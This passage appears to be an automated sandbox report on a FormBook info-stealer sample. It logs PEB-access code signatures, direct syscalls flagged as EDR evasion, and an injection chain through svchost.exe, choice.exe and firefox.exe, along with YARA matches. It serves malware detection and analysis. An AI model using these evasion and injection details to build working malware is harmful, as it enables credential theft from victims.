                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h]2_2_03C36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h]2_2_03C40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h]2_2_03C6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h]2_2_03CDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h]2_2_03CACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h]2_2_03CBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h]2_2_03C6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h]2_2_03C5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h]2_2_03C54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h]2_2_03C6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h]2_2_03CC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]2_2_03C3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h]2_2_03C649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]2_2_03CFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]2_2_03CBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h]2_2_03C629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h]2_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h]2_2_03C309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h]2_2_03CB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h]2_2_03CB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h]2_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h]2_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h]2_2_03CD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h]2_2_03CBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h]2_2_03CAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h]2_2_03CBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h]2_2_03C28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h]2_2_03CB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h]2_2_03CC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03C5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03CFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03C6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h]2_2_03C30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h]2_2_03CBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h]2_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h]2_2_03C60854
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h]2_2_03C34859
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h]2_2_03CBE872
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6870 mov eax, dword ptr fs:[00000030h]2_2_03CC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC6870 mov eax, dword ptr fs:[00000030h]2_2_03CC6870
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBC810 mov eax, dword ptr fs:[00000030h]2_2_03CBC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov ecx, dword ptr fs:[00000030h]2_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52835 mov eax, dword ptr fs:[00000030h]2_2_03C52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A830 mov eax, dword ptr fs:[00000030h]2_2_03C6A830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD483A mov eax, dword ptr fs:[00000030h]2_2_03CD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD483A mov eax, dword ptr fs:[00000030h]2_2_03CD483A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC8 mov eax, dword ptr fs:[00000030h]2_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03C2EFD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03C2EFD8
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00B01361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B01361
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00B04C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B04C7B

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\choice.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\choice.exeThread register set: target process: 5400Jump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31F7008Jump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004587B1 LogonUserW,0_2_004587B1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00464C53 mouse_event,0_2_00464C53
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OVZizpEU7Q.exe"Jump to behavior
                Source: C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exeProcess created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00457CAF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0045874B
                Source: OVZizpEU7Q.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: OVZizpEU7Q.exe, CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: CkszoACLEZHP.exe, 00000006.00000002.4758239957.0000000000DF1000.00000002.00000001.00040000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000000.2600246018.0000000000DF1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0042862B cpuid 0_2_0042862B
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00434E87
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00441E06 GetUserNameW,0_2_00441E06
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00433F3A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
